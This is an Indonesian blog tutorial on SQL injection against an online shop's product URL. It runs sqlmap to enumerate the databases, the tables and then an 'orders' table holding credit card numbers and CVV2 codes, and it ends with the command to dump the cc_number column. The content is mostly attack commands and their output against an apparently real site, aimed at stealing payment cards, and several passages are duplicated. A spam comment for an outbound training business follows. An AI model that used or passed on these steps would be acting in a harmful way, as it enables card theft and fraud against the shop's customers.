Pertama kita siapkan tools" nya dahulu :
Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="
http://www.zite.com/merchandise/index.php?cat=268
menjadi :
http://www.zite.com/merchandise/index.php?cat='268
menjadi :
http://www.zite.com/merchandise/index.php?cat='268
Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u link --dbs
berikut perintahnya : ./sqlmap.py -u link --dbs
[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema
Database: balboast_gkgcart
[88 tables]
+-----------------------+
| amanu |
| categories |
| clients |
| components |
| config |
| config_groups |
| customers |
| form_data |
| form_fields |
| forms |
| geo |
| groups |
| item_amanu |
| item_cat |
| item_files |
| item_files_customer |
| item_options |
| item_options_linked |
| item_options_values |
| item_related |
| item_thread |
| item_thread_old |
| items |
| items_addphoto |
| items_item_files |
| items_packages |
| languages |
| logs |
| mailinglist |
| mailinglist_cat |
| mailinglist_members |
| manu |
| news |
| news_cat |
| news_news_cat |
| orders |
| photos |
| photos_cat |
| pic_gallery |
| ship_prices |
| ship_zones |
| sites |
| sites_components |
| thread |
| thread_gel |
| thread_items |
| ups |
| ups_packaging |
| ups_pickup |
| ups_service |
| ups_units |
| users |
| users_access |
| users_groups |
| users_spu |
| users_spu_values |
| zones |
+-----------------------+
[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'
Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns
Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns
Maka akan muncul seperti ini :
Table: orders
[18 columns]
+-----------------+-------------+
| Column | Type |
+-----------------+-------------+
| cart_id | varchar(15) |
| cc_ex_month | tinyint(4) |
| cc_ex_year | int(11) |
| cc_number | varchar(30) |
| cc_type | varchar(20) |
| customer_id | int(11) |
| cvv2 | varchar(20) |
| date | datetime |
| id | int(11) |
| ipaddress | varchar(25) |
| payment_method | varchar(15) |
| shipping | float(8,2) |
| shipping_method | varchar(5) |
| status | tinyint(4) |
| subtotal | float(8,2) |
| tax | float(8,2) |
| text | text |
| total | float(8,2) |
+-----------------+-------------+
[18 columns]
+-----------------+-------------+
| Column | Type |
+-----------------+-------------+
| cart_id | varchar(15) |
| cc_ex_month | tinyint(4) |
| cc_ex_year | int(11) |
| cc_number | varchar(30) |
| cc_type | varchar(20) |
| customer_id | int(11) |
| cvv2 | varchar(20) |
| date | datetime |
| id | int(11) |
| ipaddress | varchar(25) |
| payment_method | varchar(15) |
| shipping | float(8,2) |
| shipping_method | varchar(5) |
| status | tinyint(4) |
| subtotal | float(8,2) |
| tax | float(8,2) |
| text | text |
| total | float(8,2) |
+-----------------+-------------+
Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump
contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump
contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .
SEKIAN DAN TERIMA KASIH
Gunakan Dengan Bijak
WilBOZ Outbound Team Kediri melayani jasa outbound training, fun games, outdoor activity bagi sekolah, instansi dll.
ReplyDeleteInfo lebih lanjut silahkan lihat di blog kami http://wilbozoutbound.blogspot.co.id/